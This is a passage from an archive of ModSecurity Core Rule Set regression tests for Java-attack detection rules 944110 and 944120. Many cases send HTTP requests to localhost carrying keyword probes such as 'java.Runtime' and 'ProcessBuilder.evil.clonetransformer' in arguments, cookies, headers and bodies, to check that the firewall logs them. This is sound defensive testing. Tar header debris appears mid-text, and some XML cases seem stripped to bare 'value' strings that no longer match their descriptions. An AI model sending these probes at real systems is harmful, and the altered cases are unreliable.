Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-11 desc: XML element includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944110\"" - test_title: 944110-12 desc: XML attribute name includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944110\"" - test_title: 944110-13 desc: XML attribute value includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944110\"" - test_title: 944110-14 desc: XML element value includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.Runtime" output: log_contains: "id \"944110\"" - test_title: 944110-15 desc: XML element includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944110\"" - test_title: 944110-16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944110\"" - test_title: 944110-17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944110\"" - test_title: 944110-18 desc: XML element value includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.ProcessBuilder" output: log_contains: "id \"944110\"" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml��������0000664�0000000�0000000�00000375672�14461225151�0027711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944120.yaml" description: "Positive tests for rule 944120" tests: - test_title: 944120-0 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-1 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer=test" output: log_contains: "id \"944120\"" - test_title: 944120-2 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-3 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.clonetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-4 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-5 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-6 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-7 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-8 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-9 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-10 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-11 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" output: log_contains: "id \"944120\"" - test_title: 944120-12 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-13 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-14 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-15 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-17 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-18 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure=test" output: log_contains: "id \"944120\"" - test_title: 944120-19 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-20 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.forclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-21 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-22 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-23 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-24 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-25 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-26 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-27 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: log_contains: "id \"944120\"" - test_title: 944120-28 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" output: log_contains: "id \"944120\"" - test_title: 944120-29 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-30 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-31 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-32 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-34 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-35 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory=test" output: log_contains: "id \"944120\"" - test_title: 944120-36 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-37 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 